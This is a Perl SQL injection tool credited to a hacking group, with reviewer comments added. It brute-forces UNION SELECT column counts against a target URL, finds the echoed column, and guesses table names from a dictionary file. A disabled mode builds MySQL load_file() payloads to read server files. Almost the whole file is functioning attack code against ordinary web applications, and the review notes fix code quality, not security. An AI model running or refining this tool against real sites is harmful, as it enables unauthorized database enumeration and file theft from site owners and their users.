#!/usr/bin/perl
#=========================================================================#
# AOH SQL injection helper (UNION-based column/table brute force).
#
# Modes, selected by $ARGV[0] (parsed by hand below; Getopt::Std is
# imported but never used):
#   (none)  interactive load_file() mode -- effectively disabled, see ans()
#   -b      find the number of UNION columns and which one is echoed back
#   -t FILE same as -b, then test each line of FILE as a table name
#
# NOTE(review): no `use strict; use warnings;`. Every variable below is a
# package global, and several subs communicate only through them
# ($u, $f, $n, $c, $ur, $cont, $szz, $p, $utmp). Keep that in mind before
# reordering anything. All network I/O goes through LWP::UserAgent.
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#
#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; # "only chars in result" -- never read anywhere in this file
my $www = LWP::UserAgent->new; # shared HTTP client used by chk() and conn()
uss();
# No argument: interactive load_file() loop. ans() exits immediately
# (see below), so the while loop is unreachable in this version.
if(!$ARGV[0]) {
  ans();
  # NOTE(review): bareword `true` with no strict is the string "true",
  # which is always truthy; `while (1)` is the idiom.
  while (true) {
    print "\nNew file (^c for quit) ->";
    $f=<STDIN>;
    $f =~ s/\n//;
    enc(); # encode file name as a comma-separated list of char codes
    burl();
    conn();
    getres();
  }
}
# -b / -t: the target URL is read from STDIN, unvalidated, and used as the
# prefix of every request below.
if ($ARGV[0] eq '-b') {
  print "Url for brute-> ";
  $u=<STDIN>;
  $u =~ s/\n//;
  brute();
}
if ($ARGV[0] eq '-t') {
  print "Url for brute-> ";
  $u=<STDIN>;
  $u =~ s/\n//;
  brute_table()
}
#=END=MAIN============================================================#
#=======================================================================#
# brute(): try UNION SELECT with 1..39 columns against $u. Each column is
# the expression "N26639-1"; chk() looks for "N26638" in the response,
# which is what that expression evaluates to if the DB echoes the column.
# Prints the first column count that works plus the clean URL, then exits.
# Side effects: reads $u, uses globals $max, $res (unused), $j, $i, $utmp,
# $coll, and $szz (set inside chk()).
# NOTE(review): `sub brute()` declares an empty prototype; it is harmless
# here because the sub is always called as brute() with no arguments.
sub brute() {
  $max=40;
  $res='';
  for ($j=1;$j<$max;$j++) {
    for ($i=1;$i<$j+1;$i++) {
      $utmp.=$i."26639-1,";
    }
    $utmp = substr($utmp, 0, length ($utmp) - 1 ); # drop trailing ","
    $utmp = $u."+UNION+SELECT+".$utmp."/*";
    if($coll=chk($utmp)) {
      # backslash is used as the s/// delimiter here: strip the "26639-1"
      # marker so the printed URL shows plain column numbers.
      $utmp =~ s\26639-1\\g;
      print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
      exit(0);
    } else {
      # $szz is the response length recorded by chk()
      print("[-$j] falure... ($szz Bytes)\r\n");
    }
    #print $utmp."\r\n";
    $utmp="";
  }
}
########################################
# brute_table(): same column search as brute(); once a visible column is
# found, each line of the dictionary file $ARGV[1] is appended as
# "+FROM+<line>/*" and re-checked with chk(). Lines that still return the
# marker are reported as existing tables. Always exits after the first
# successful column count.
# NOTE(review): open() is the 2-arg form, its result is unchecked, and
# $ARGV[1] may be undef -- a failed open makes readline() return undef and
# the table loop silently runs zero times. Use
# `open(my $fh, '<', $ARGV[1]) or die "open $ARGV[1]: $!"`.
# NOTE(review): dictionary lines are interpolated into the URL without any
# encoding.
sub brute_table() {
  print("--- bruting Colouns ---\r\n");
  $max=40;
  $res='';
  for ($j=1;$j<$max;$j++) {
    for ($i=1;$i<$j+1;$i++) {
      $utmp.=$i."26639-1,";
    }
    $utmp = substr($utmp, 0, length ($utmp) - 1 ); # drop trailing ","
    $utmp = $u."+UNION+SELECT+".$utmp."/*";
    if($coll=chk($utmp)) {
      print("[+$j] OK! 
Coloun number $coll is visible\r\n$utmp");
      print("\r\n--- bruting Tables ---\r\n");
      open(CATFILE, $ARGV[1]);
      while($line=readline(CATFILE)) {
        chomp($line);
        $sql=substr($utmp,0,length($utmp)-2); # drop the trailing "/*"
        $sql.="+FROM+".$line."/*";
        if (chk($sql)) {
          $sql =~ s\26639-1\\g; # strip the marker for display
          print "[OK] ".$sql."\r\n";
          $all_sql.="[OK] ".$sql."\r\n";
        } else {
          print "[-] No table $line\r\n";
        }
        $sql="";
      }
      print("\r\n--- Results ---\r\n");
      print $all_sql;
      exit;
    } else {
      print("[-$j] falure... ($szz Bytes)\r\n");
    }
    #print $utmp."\r\n";
    $utmp="";
  }
}
########################################
# chk(URL): GET the URL with $www, record the body length in the global
# $szz, and return the digits preceding "26638" in the body (the index of
# the column that was echoed), or false when the marker is absent.
# NOTE(review): LWP's get() normally returns a response object even when
# the request fails, so `or die()` is unlikely ever to fire; HTTP errors
# are not checked ($resp->is_success) -- confirm against LWP docs.
# NOTE(review): the empty `()` prototype would reject the argument if chk
# were declared before its callers; it only parses because chk is defined
# after brute()/brute_table() in this file.
sub chk() {
  $resp = $www -> get( $_[0] ) or die();
  $szz=length($resp->content());
  if ($resp->content() =~ /(\d+)26638/) {return($1);}
}
# ans(): was meant to prompt for the union URL, column count and visible
# column ($u, $n, $c) for load_file mode. The first statement exits, so
# everything after it is dead code.
# NOTE(review): exit() takes a status, not a message; a non-numeric string
# numifies to 0, so the "beta version" text is never shown and the script
# ends with status 0. Print the message first, then exit(1).
sub ans() {
  exit("bete verion, load_file not correctly working. use -b or -t ");
  print "\nAnsver some questions ;)\r\n";
  print "Url for union-> ";
  $u=<STDIN>;
  print "Number of coloums -> ";
  $n=<STDIN>;
  print "Coloum with union -> ";
  $c=<STDIN>;
  $u =~ s/\n//;
  $f =~ s/\n//;
}
# enc(): rewrite global $f in place as the comma-separated ord() values of
# its characters (e.g. "ab" -> "97,98"), for use inside char(...) in burl().
# Uses global $enc as scratch and clears it afterwards.
sub enc() {
  for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
  $enc = substr($enc, 0, length ($enc) - 1 ); # drop trailing ","
  $f=$enc;
  $enc='';
}
# burl(): build global $ur = $u + "+union+select+" + $n columns, where
# column $c (1-based) is load_file(char($f)) and the rest are 0.
# $n and $c come from ans() and are used as numbers without validation.
sub burl() {
  print "[~] File: $f\n";
  $ur = $u;
  $tmp='';
  for ($i=0;$i<$n;$i++) {
    if($i==$c-1) {
      $tmp.="load_file(char($f)),";
    } else {
      $tmp.="0,";
    }
  }
  $tmp = substr($tmp, 0, length ($tmp) - 1 ); # drop trailing ","
  $ur.= "+union+select+$tmp/*";
  print "[~] url: $ur\n";
}
# conn(): GET $ur and store the raw response body in global $cont.
# No status check is performed.
sub conn () {
  print "[~] Sending ...\n";
  my $resp = $www -> get( $ur );
  $cont = $resp -> content();
}
# getres(): scan $cont line by line and collect the lines that fall after a
# line matching `_page">` and before the next line matching `</`, then
# print them with all spaces removed.
# NOTE(review): $p is a package global that is never reset on entry, so its
# last value from a previous call leaks into the next one.
sub getres() {
  $s="_page\">"; # start marker (used as a regex)
  $e="</";       # end marker (used as a regex)
  $result;       # no-op statement; $result is a global, nothing is declared
  #print $cont;
  print "[~] Start: $s \n";
  print "[~] End: $e \n";
  print "[~] Searching...\n ";
  @stringz=split("\n",$cont);
  for(@stringz) {
    if(/$e/) { $p = 0; }
    $result .= $_."\r\n" if $p;
    if(/$s/){ $p = 1; }
  }
  # search list has one more char (the space) than the replacement list,
  # so with /d the space is deleted and letters map to themselves.
  $result =~ tr/a-zA-Z /a-zA-Z/d;
  if($result) {
    print "[+] I found something! 
\n\n $result";
  } else {
    print "[-] Not found...\n ";
  }
  $result='';
}
# uss(): print the banner and the -b / -t usage lines.
sub uss() {
  print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n";
  print '-b for brute colouns'."\n";
  print '-t [dictionary_table] for brute tables and colouns'."\n\n";
}